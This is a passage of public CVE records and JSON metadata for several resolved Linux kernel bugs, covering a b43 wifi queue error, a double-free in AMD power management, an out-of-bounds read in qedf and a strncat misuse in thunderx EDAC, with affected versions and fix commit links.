"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: b43: Stop/wake correct queue in DMA Tx path when QoS is disabled\n\nWhen QoS is disabled, the queue priority value will not map to the correct\nieee80211 queue since there is only one queue. Stop/wake queue 0 when QoS\nis disabled to prevent trying to stop/wake a non-existent queue and failing\nto stop/wake the actual queue instantiated.\n\nLog of issue before change (with kernel parameter qos=0):\n [ +5.112651] ------------[ cut here ]------------\n [ +0.000005] WARNING: CPU: 7 PID: 25513 at net/mac80211/util.c:449 __ieee80211_wake_queue+0xd5/0x180 [mac80211]\n [ +0.000067] Modules linked in: b43(O) snd_seq_dummy snd_hrtimer snd_seq snd_seq_device nft_chain_nat xt_MASQUERADE nf_nat xfrm_user xfrm_algo xt_addrtype overlay ccm af_packet amdgpu snd_hda_codec_cirrus snd_hda_codec_generic ledtrig_audio drm_exec amdxcp gpu_sched xt_conntrack nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 ip6t_rpfilter ipt_rpfilter xt_pkttype xt_LOG nf_log_syslog xt_tcpudp nft_compat nf_tables nfnetlink sch_fq_codel btusb uinput iTCO_wdt ctr btrtl intel_pmc_bxt i915 intel_rapl_msr mei_hdcp mei_pxp joydev at24 watchdog btintel atkbd libps2 serio radeon btbcm vivaldi_fmap btmtk intel_rapl_common snd_hda_codec_hdmi bluetooth uvcvideo nls_iso8859_1 applesmc nls_cp437 x86_pkg_temp_thermal snd_hda_intel intel_powerclamp vfat videobuf2_vmalloc coretemp fat snd_intel_dspcfg crc32_pclmul uvc polyval_clmulni snd_intel_sdw_acpi loop videobuf2_memops snd_hda_codec tun drm_suballoc_helper polyval_generic drm_ttm_helper drm_buddy tap ecdh_generic videobuf2_v4l2 gf128mul macvlan ttm ghash_clmulni_intel ecc tg3\n [ +0.000044] videodev bridge snd_hda_core rapl crc16 drm_display_helper cec mousedev snd_hwdep evdev intel_cstate bcm5974 hid_appleir videobuf2_common stp mac_hid libphy snd_pcm drm_kms_helper acpi_als mei_me intel_uncore llc mc snd_timer intel_gtt industrialio_triggered_buffer apple_mfi_fastcharge i2c_i801 mei snd lpc_ich agpgart ptp i2c_smbus thunderbolt apple_gmux i2c_algo_bit kfifo_buf video industrialio soundcore pps_core wmi tiny_power_button sbs sbshc button ac cordic bcma mac80211 cfg80211 ssb rfkill libarc4 kvm_intel kvm drm irqbypass fuse backlight firmware_class efi_pstore configfs efivarfs dmi_sysfs ip_tables x_tables autofs4 dm_crypt cbc encrypted_keys trusted asn1_encoder tee tpm rng_core input_leds hid_apple led_class hid_generic usbhid hid sd_mod t10_pi crc64_rocksoft crc64 crc_t10dif crct10dif_generic ahci libahci libata uhci_hcd ehci_pci ehci_hcd crct10dif_pclmul crct10dif_common sha512_ssse3 sha512_generic sha256_ssse3 sha1_ssse3 aesni_intel usbcore scsi_mod libaes crypto_simd cryptd scsi_common\n [ +0.000055] usb_common rtc_cmos btrfs blake2b_generic libcrc32c crc32c_generic crc32c_intel xor raid6_pq dm_snapshot dm_bufio dm_mod dax [last unloaded: b43(O)]\n [ +0.000009] CPU: 7 PID: 25513 Comm: irq/17-b43 Tainted: G W O 6.6.7 #1-NixOS\n [ +0.000003] Hardware name: Apple Inc. MacBookPro8,3/Mac-942459F5819B171B, BIOS 87.0.0.0.0 06/13/2019\n [ +0.000001] RIP: 0010:__ieee80211_wake_queue+0xd5/0x180 [mac80211]\n [ +0.000046] Code: 00 45 85 e4 0f 85 9b 00 00 00 48 8d bd 40 09 00 00 f0 48 0f ba ad 48 09 00 00 00 72 0f 5b 5d 41 5c 41 5d 41 5e e9 cb 6d 3c d0 \u003c0f\u003e 0b 5b 5d 41 5c 41 5d 41 5e c3 cc cc cc cc 48 8d b4 16 94 00 00\n [ +0.000002] RSP: 0018:ffffc90003c77d60 EFLAGS: 00010097\n [ +0.000001] RAX: 0000000000000001 RBX: 0000000000000002 RCX: 0000000000000000\n [ +0.000001] RDX: 0000000000000000 RSI: 0000000000000002 RDI: ffff88820b924900\n [ +0.000002] RBP: ffff88820b924900 R08: ffffc90003c77d90 R09: 000000000003bfd0\n [ +0.000001] R10: ffff88820b924900 R11: ffffc90003c77c68 R12: 0000000000000000\n [ +0.000001] R13: 0000000000000000 R14: ffffc90003c77d90 R15: ffffffffc0fa6f40\n [ +0.000001] FS: 0000000000000000(0000) GS:ffff88846fb80000(0000) knlGS:0000000000000000\n [ +0.000001] CS: 0010 DS: 0\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:40:44.633Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1824f942527f784a19e01eac2d9679a21623d010"
},
{
"url": "https://git.kernel.org/stable/c/31aaf17200c336fe258b70d39c40645ae19d0240"
},
{
"url": "https://git.kernel.org/stable/c/49f067726ab01c87cf57566797a8a719badbbf08"
},
{
"url": "https://git.kernel.org/stable/c/04a2b6eff2ae1c19cb7f41e803bcbfaf94c06455"
},
{
"url": "https://git.kernel.org/stable/c/c67698325c68f8768db858f5c87c34823421746d"
},
{
"url": "https://git.kernel.org/stable/c/bc845e2e42cae95172c04bf29807c480f51a2a83"
},
{
"url": "https://git.kernel.org/stable/c/4049a9f80513a6739c5677736a4c88f96df1b436"
},
{
"url": "https://git.kernel.org/stable/c/f1cf77bb870046a6111a604f7f7fe83d1c8c9610"
},
{
"url": "https://git.kernel.org/stable/c/9636951e4468f02c72cc75a82dc65d003077edbc"
}
],
"title": "wifi: b43: Stop/wake correct queue in DMA Tx path when QoS is disabled",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52644",
"datePublished": "2024-04-17T10:27:23.053Z",
"dateReserved": "2024-03-06T09:52:12.094Z",
"dateUpdated": "2025-05-04T07:40:44.633Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52691 (GCVE-0-2023-52691)
Vulnerability from cvelistv5
Published
2024-05-17 14:24
Modified
2025-05-04 07:41
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amd/pm: fix a double-free in si_dpm_init
When the allocation of
adev->pm.dpm.dyn_state.vddc_dependency_on_dispclk.entries fails,
amdgpu_free_extended_power_table is called to free some fields of adev.
However, when the control flow returns to si_dpm_sw_init, it goes to
label dpm_failed and calls si_dpm_fini, which calls
amdgpu_free_extended_power_table again and free those fields again. Thus
a double-free is triggered.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 841686df9f7d2942cfd94d024b8591fa3f74ef7c Version: 841686df9f7d2942cfd94d024b8591fa3f74ef7c Version: 841686df9f7d2942cfd94d024b8591fa3f74ef7c Version: 841686df9f7d2942cfd94d024b8591fa3f74ef7c Version: 841686df9f7d2942cfd94d024b8591fa3f74ef7c Version: 841686df9f7d2942cfd94d024b8591fa3f74ef7c Version: 841686df9f7d2942cfd94d024b8591fa3f74ef7c Version: 841686df9f7d2942cfd94d024b8591fa3f74ef7c |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52691",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-17T16:59:58.212684Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:23:55.721Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:11:35.720Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/afe9f5b871f86d58ecdc45b217b662227d7890d0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/06d95c99d5a4f5accdb79464076efe62e668c706"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aeed2b4e4a70c7568d4a5eecd6a109713c0dfbf4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2bf47c89bbaca2bae16581ef1b28aaec0ade0334"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f957a1be647f7fc65926cbf572992ec2747a93f2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fb1936cb587262cd539e84b34541abb06e42b2f9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ca8e2e251c65e5a712f6025e27bd9b26d16e6f4a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ac16667237a82e2597e329eb9bc520d1cf9dff30"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "afe9f5b871f86d58ecdc45b217b662227d7890d0",
"status": "affected",
"version": "841686df9f7d2942cfd94d024b8591fa3f74ef7c",
"versionType": "git"
},
{
"lessThan": "06d95c99d5a4f5accdb79464076efe62e668c706",
"status": "affected",
"version": "841686df9f7d2942cfd94d024b8591fa3f74ef7c",
"versionType": "git"
},
{
"lessThan": "aeed2b4e4a70c7568d4a5eecd6a109713c0dfbf4",
"status": "affected",
"version": "841686df9f7d2942cfd94d024b8591fa3f74ef7c",
"versionType": "git"
},
{
"lessThan": "2bf47c89bbaca2bae16581ef1b28aaec0ade0334",
"status": "affected",
"version": "841686df9f7d2942cfd94d024b8591fa3f74ef7c",
"versionType": "git"
},
{
"lessThan": "f957a1be647f7fc65926cbf572992ec2747a93f2",
"status": "affected",
"version": "841686df9f7d2942cfd94d024b8591fa3f74ef7c",
"versionType": "git"
},
{
"lessThan": "fb1936cb587262cd539e84b34541abb06e42b2f9",
"status": "affected",
"version": "841686df9f7d2942cfd94d024b8591fa3f74ef7c",
"versionType": "git"
},
{
"lessThan": "ca8e2e251c65e5a712f6025e27bd9b26d16e6f4a",
"status": "affected",
"version": "841686df9f7d2942cfd94d024b8591fa3f74ef7c",
"versionType": "git"
},
{
"lessThan": "ac16667237a82e2597e329eb9bc520d1cf9dff30",
"status": "affected",
"version": "841686df9f7d2942cfd94d024b8591fa3f74ef7c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.9"
},
{
"lessThan": "4.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/pm: fix a double-free in si_dpm_init\n\nWhen the allocation of\nadev-\u003epm.dpm.dyn_state.vddc_dependency_on_dispclk.entries fails,\namdgpu_free_extended_power_table is called to free some fields of adev.\nHowever, when the control flow returns to si_dpm_sw_init, it goes to\nlabel dpm_failed and calls si_dpm_fini, which calls\namdgpu_free_extended_power_table again and free those fields again. Thus\na double-free is triggered."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:41:43.209Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/afe9f5b871f86d58ecdc45b217b662227d7890d0"
},
{
"url": "https://git.kernel.org/stable/c/06d95c99d5a4f5accdb79464076efe62e668c706"
},
{
"url": "https://git.kernel.org/stable/c/aeed2b4e4a70c7568d4a5eecd6a109713c0dfbf4"
},
{
"url": "https://git.kernel.org/stable/c/2bf47c89bbaca2bae16581ef1b28aaec0ade0334"
},
{
"url": "https://git.kernel.org/stable/c/f957a1be647f7fc65926cbf572992ec2747a93f2"
},
{
"url": "https://git.kernel.org/stable/c/fb1936cb587262cd539e84b34541abb06e42b2f9"
},
{
"url": "https://git.kernel.org/stable/c/ca8e2e251c65e5a712f6025e27bd9b26d16e6f4a"
},
{
"url": "https://git.kernel.org/stable/c/ac16667237a82e2597e329eb9bc520d1cf9dff30"
}
],
"title": "drm/amd/pm: fix a double-free in si_dpm_init",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52691",
"datePublished": "2024-05-17T14:24:51.294Z",
"dateReserved": "2024-03-07T14:49:46.888Z",
"dateUpdated": "2025-05-04T07:41:43.209Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38559 (GCVE-0-2024-38559)
Vulnerability from cvelistv5
Published
2024-06-19 13:35
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: qedf: Ensure the copied buf is NUL terminated
Currently, we allocate a count-sized kernel buffer and copy count from
userspace to that buffer. Later, we use kstrtouint on this buffer but we
don't ensure that the string is terminated inside the buffer, this can
lead to OOB read when using kstrtouint. Fix this issue by using
memdup_user_nul instead of memdup_user.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 61d8658b4a435eac729966cc94cdda077a8df5cd Version: 61d8658b4a435eac729966cc94cdda077a8df5cd Version: 61d8658b4a435eac729966cc94cdda077a8df5cd Version: 61d8658b4a435eac729966cc94cdda077a8df5cd Version: 61d8658b4a435eac729966cc94cdda077a8df5cd Version: 61d8658b4a435eac729966cc94cdda077a8df5cd Version: 61d8658b4a435eac729966cc94cdda077a8df5cd Version: 61d8658b4a435eac729966cc94cdda077a8df5cd Version: 61d8658b4a435eac729966cc94cdda077a8df5cd |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-38559",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-24T15:39:36.404554Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-01T14:24:43.560Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:27.087Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1f84a2744ad813be23fc4be99fb74bfb24aadb95"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a75001678e1d38aa607d5b898ec7ff8ed0700d59"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/769b9fd2af02c069451fe9108dba73355d9a021c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dccd97b39ab2f2b1b9a47a1394647a4d65815255"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d93318f19d1e1a6d5f04f5d965eaa9055bb7c613"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/563e609275927c0b75fbfd0d90441543aa7b5e0d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4907f5ad246fa9b51093ed7dfc7da9ebbd3f20b8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/177f43c6892e6055de6541fe9391a8a3d1f95fc9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d0184a375ee797eb657d74861ba0935b6e405c62"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/qedf/qedf_debugfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1f84a2744ad813be23fc4be99fb74bfb24aadb95",
"status": "affected",
"version": "61d8658b4a435eac729966cc94cdda077a8df5cd",
"versionType": "git"
},
{
"lessThan": "a75001678e1d38aa607d5b898ec7ff8ed0700d59",
"status": "affected",
"version": "61d8658b4a435eac729966cc94cdda077a8df5cd",
"versionType": "git"
},
{
"lessThan": "769b9fd2af02c069451fe9108dba73355d9a021c",
"status": "affected",
"version": "61d8658b4a435eac729966cc94cdda077a8df5cd",
"versionType": "git"
},
{
"lessThan": "dccd97b39ab2f2b1b9a47a1394647a4d65815255",
"status": "affected",
"version": "61d8658b4a435eac729966cc94cdda077a8df5cd",
"versionType": "git"
},
{
"lessThan": "d93318f19d1e1a6d5f04f5d965eaa9055bb7c613",
"status": "affected",
"version": "61d8658b4a435eac729966cc94cdda077a8df5cd",
"versionType": "git"
},
{
"lessThan": "563e609275927c0b75fbfd0d90441543aa7b5e0d",
"status": "affected",
"version": "61d8658b4a435eac729966cc94cdda077a8df5cd",
"versionType": "git"
},
{
"lessThan": "4907f5ad246fa9b51093ed7dfc7da9ebbd3f20b8",
"status": "affected",
"version": "61d8658b4a435eac729966cc94cdda077a8df5cd",
"versionType": "git"
},
{
"lessThan": "177f43c6892e6055de6541fe9391a8a3d1f95fc9",
"status": "affected",
"version": "61d8658b4a435eac729966cc94cdda077a8df5cd",
"versionType": "git"
},
{
"lessThan": "d0184a375ee797eb657d74861ba0935b6e405c62",
"status": "affected",
"version": "61d8658b4a435eac729966cc94cdda077a8df5cd",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/scsi/qedf/qedf_debugfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.11"
},
{
"lessThan": "4.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qedf: Ensure the copied buf is NUL terminated\n\nCurrently, we allocate a count-sized kernel buffer and copy count from\nuserspace to that buffer. Later, we use kstrtouint on this buffer but we\ndon\u0027t ensure that the string is terminated inside the buffer, this can\nlead to OOB read when using kstrtouint. Fix this issue by using\nmemdup_user_nul instead of memdup_user."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:14:05.664Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1f84a2744ad813be23fc4be99fb74bfb24aadb95"
},
{
"url": "https://git.kernel.org/stable/c/a75001678e1d38aa607d5b898ec7ff8ed0700d59"
},
{
"url": "https://git.kernel.org/stable/c/769b9fd2af02c069451fe9108dba73355d9a021c"
},
{
"url": "https://git.kernel.org/stable/c/dccd97b39ab2f2b1b9a47a1394647a4d65815255"
},
{
"url": "https://git.kernel.org/stable/c/d93318f19d1e1a6d5f04f5d965eaa9055bb7c613"
},
{
"url": "https://git.kernel.org/stable/c/563e609275927c0b75fbfd0d90441543aa7b5e0d"
},
{
"url": "https://git.kernel.org/stable/c/4907f5ad246fa9b51093ed7dfc7da9ebbd3f20b8"
},
{
"url": "https://git.kernel.org/stable/c/177f43c6892e6055de6541fe9391a8a3d1f95fc9"
},
{
"url": "https://git.kernel.org/stable/c/d0184a375ee797eb657d74861ba0935b6e405c62"
}
],
"title": "scsi: qedf: Ensure the copied buf is NUL terminated",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38559",
"datePublished": "2024-06-19T13:35:28.888Z",
"dateReserved": "2024-06-18T19:36:34.922Z",
"dateUpdated": "2025-11-04T17:21:27.087Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-52464 (GCVE-0-2023-52464)
Vulnerability from cvelistv5
Published
2024-02-23 14:46
Modified
2025-05-04 07:37
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
EDAC/thunderx: Fix possible out-of-bounds string access
Enabling -Wstringop-overflow globally exposes a warning for a common bug
in the usage of strncat():
drivers/edac/thunderx_edac.c: In function 'thunderx_ocx_com_threaded_isr':
drivers/edac/thunderx_edac.c:1136:17: error: 'strncat' specified bound 1024 equals destination size [-Werror=stringop-overflow=]
1136 | strncat(msg, other, OCX_MESSAGE_SIZE);
| ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
...
1145 | strncat(msg, other, OCX_MESSAGE_SIZE);
...
1150 | strncat(msg, other, OCX_MESSAGE_SIZE);
...
Apparently the author of this driver expected strncat() to behave the
way that strlcat() does, which uses the size of the destination buffer
as its third argument rather than the length of the source buffer. The
result is that there is no check on the size of the allocated buffer.
Change it to strlcat().
[ bp: Trim compiler output, fixup commit message. ]
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 41003396f932d7f027725c7acebb6a7caa41dc3e Version: 41003396f932d7f027725c7acebb6a7caa41dc3e Version: 41003396f932d7f027725c7acebb6a7caa41dc3e Version: 41003396f932d7f027725c7acebb6a7caa41dc3e Version: 41003396f932d7f027725c7acebb6a7caa41dc3e Version: 41003396f932d7f027725c7acebb6a7caa41dc3e Version: 41003396f932d7f027725c7acebb6a7caa41dc3e Version: 41003396f932d7f027725c7acebb6a7caa41dc3e |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52464",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-23T18:16:12.525994Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:24:08.394Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:19.771Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/71c17ee02538802ceafc830f0736aa35b564e601"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5da3b6e7196f0b4f3728e4e25eb20233a9ddfaf6"
},
{
